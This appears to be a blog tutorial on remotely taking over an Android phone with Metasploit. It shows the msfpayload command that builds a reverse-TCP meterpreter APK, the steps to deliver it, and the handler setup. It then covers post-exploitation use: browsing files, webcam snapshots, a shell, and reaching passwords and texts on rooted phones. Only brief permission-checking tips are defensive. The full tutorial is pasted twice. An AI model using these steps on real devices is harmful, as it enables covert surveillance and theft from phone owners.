This is a tutorial explaining how to remotely hack android device using Metasploit in Kali Linux. Metasploit is one of best security tools. And the best thing to know is that Metasploit has added some functionality for security testing Android Devices.
In this post we will discuss how to get a remote shell on an Android by using Metasploit in Kali Linux. We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.
First of all you need to find your public/external ip and port forwarding
Also read how to schedule any script to run automatically on any event such as login or at a certain time in windows.
1. In Kali Linux, open a terminal prompt and type:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16LPORT=4444 R >app.apk
(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for the LPORT address.)
The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it. Once this is run, a file called “app.apk” will be created:
2. Now just send this file to your Android device, I used a Smart Phone in this instance.
3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!
Now when that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.
4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
5. Once Metasploit starts, type in the following to create a listener:
user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444
Then just type exploit to start the handler:
6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.
7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created. Now on your Metaploit system you should see this:
An active session is created and it drops you automatically into a meterpreter prompt.
8. From here your can type “sysinfo” to get information on the device:
9. You can see the processes running by typing, “ps”:
You are done!
Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and
cd. The Download directory usually has interesting things in it. Though it may error out, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.
Typing “help” at a meterpreter prompt will list all the command that are available. We can also run the shell command that will drop us into a direct Terminal shell if we want:
meterpreter > shell
Process 1 created.
Channel 1 created.
lf the Android phone being attacked is rooted, you can even access the stored passwords, texts or phone logs.
But if the phone is not rooted, one will not be able to access them… Remotely…
This can be noted as a con of rooted phone!
And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from
a major vendor? It had no problems with letting my remote shell run.
Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.
One method to avoid such condition is to update your Google play store and install apps from there only but one can't get all apps specially one used by rooted phones for somewhat unethical purpose. So the ultimate method is to monitor the permissions required by the apps while installation.
In this post we will discuss how to get a remote shell on an Android by using Metasploit in Kali Linux. We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.
First of all you need to find your public/external ip and port forwarding
Also read how to schedule any script to run automatically on any event such as login or at a certain time in windows.
Creating a booby trapped APK file
Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.1. In Kali Linux, open a terminal prompt and type:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16LPORT=4444 R >app.apk
(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for the LPORT address.)
The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it. Once this is run, a file called “app.apk” will be created:
2. Now just send this file to your Android device, I used a Smart Phone in this instance.
3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!
Now when that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.
4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
5. Once Metasploit starts, type in the following to create a listener:
user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444
Then just type exploit to start the handler:
6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.
7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created. Now on your Metaploit system you should see this:
An active session is created and it drops you automatically into a meterpreter prompt.
8. From here your can type “sysinfo” to get information on the device:
9. You can see the processes running by typing, “ps”:
You are done!
Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and
cd. The Download directory usually has interesting things in it. Though it may error out, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.
Typing “help” at a meterpreter prompt will list all the command that are available. We can also run the shell command that will drop us into a direct Terminal shell if we want:
meterpreter > shell
Process 1 created.
Channel 1 created.
lf the Android phone being attacked is rooted, you can even access the stored passwords, texts or phone logs.
But if the phone is not rooted, one will not be able to access them… Remotely…
This can be noted as a con of rooted phone!
And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from
a major vendor? It had no problems with letting my remote shell run.
Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.
One method to avoid such condition is to update your Google play store and install apps from there only but one can't get all apps specially one used by rooted phones for somewhat unethical purpose. So the ultimate method is to monitor the permissions required by the apps while installation.
COMMENTS